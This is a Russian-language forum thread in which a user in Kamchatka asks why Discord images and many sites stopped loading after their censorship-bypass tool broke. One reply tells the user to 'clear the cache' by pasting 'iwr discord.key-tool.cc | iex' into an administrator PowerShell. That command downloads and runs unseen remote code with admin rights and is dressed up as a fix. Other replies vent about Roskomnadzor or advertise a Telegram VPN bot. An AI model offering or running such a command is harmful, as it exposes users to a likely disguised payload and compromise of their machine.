Интернет на Дальнем Востоке
Живу на Камчатке. Где то дня 3 назад, когда сломался zapret-discord-youtube для Discord и YouTube, интернет стал сильно тормозить, на Камчатке (как я знаю, именно тут), на 1-2 дня ПОЛНОСТЬЮ перестал работать интернет от МТС (но, не суть, т.к у меня Ростелеком). Теперь, когда я нашёл себе другой обход (DiscordFix) некоторые сайты, такие как, например, itch.io, scpfoundation.net и ещё наверное штук СТО разных вебсайтов перестали загружаться от слова совсем, а на кучи других начали появляться сбои. В том же Дискорде у меня херово грузят аватарки, лого серверов не грузят от слова ВООБЩЕ. Та же херь если даже выключить сам обход. Прошу помощи или хотя бы пояснения о том, что происходит.
Скорее всего надо сбросить кеш
Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:
iwr discord.key-tool.cc | iex
Нажать Enter.
(не путать с командной строкой).
В открывшемся окне нажать 1.
После выполнения команды закрыть все окна и перезагрузить ПК.
Роскомнадзор происходит. Путин же сказал "душить западные сервисы", а из-за невозможности душить их - душат россиян, пользующихся западными сервисами.
И в Москве душить не осмеливаются, потому что люди снесут их офисы быстро, а вот из Дальнего Востока до Москвы ехать долго, потому не боятся эти трусы.
впн скачай и не парься
Попробуйте @A_FAST_VPN_bot из телеграма, ездил с ним в Китай, там работал